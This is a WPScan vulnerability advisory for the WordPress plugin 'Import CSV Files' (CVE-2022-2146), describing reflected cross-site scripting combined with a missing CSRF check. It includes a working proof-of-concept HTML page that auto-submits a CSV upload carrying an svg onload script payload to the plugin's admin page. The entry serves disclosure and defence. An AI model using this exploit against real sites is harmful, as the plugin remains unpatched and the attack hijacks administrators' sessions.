WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Import CSV Files <= 1.0 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escaped imported data before outputting them back in a page, and is lacking CSRF check when performing such action as well, resulting in a Reflected Cross-Site Scripting

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/tools.php?page=import_csv_files", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------64690472712570779792526672144");
        xhr.withCredentials = true;
        var body = "-----------------------------64690472712570779792526672144\r\n" +
          "Content-Disposition: form-data; name=\"_csv_import_files_next\"\r\n" +
          "\r\n" +
          "next\r\n" +
          "-----------------------------64690472712570779792526672144\r\n" +
          "Content-Disposition: form-data; name=\"csv_import\"; filename=\"a.csv\"\r\n" +
          "Content-Type: text/csv\r\n" +
          "\r\n" +
          "My first post,May 21 2022,\x3csvg/onload=alert(/XSS/)\x3e\x3csvg\x3e\n" +
          "\r\n" +
          "-----------------------------64690472712570779792526672144\r\n" +
          "Content-Disposition: form-data; name=\"post_format\"\r\n" +
          "\r\n" +
          "post\r\n" +
          "-----------------------------64690472712570779792526672144\r\n" +
          "Content-Disposition: form-data; name=\"field-delimiter\"\r\n" +
          "\r\n" +
          ",\r\n" +
          "-----------------------------64690472712570779792526672144\r\n" +
          "Content-Disposition: form-data; name=\"submit\"\r\n" +
          "\r\n" +
          "Next \x3e\r\n" +
          "-----------------------------64690472712570779792526672144--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Affects Plugins

import-csv-files
No known fix - plugin closed

References

CVE
CVE-2022-2146

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Benachi

Submitter

Benachi

Submitter twitter
teradch
Verified

Yes

WPVDB ID
adc1d752-331e-44af-b5dc-b463d56c2cb4

Timeline

Publicly Published

2022-06-21 (about 9 months ago)

Added

2022-06-21 (about 9 months ago)

Last Updated

2023-03-26 (about 2 days ago)

Our Other Services

WPScan WordPress Security Plugin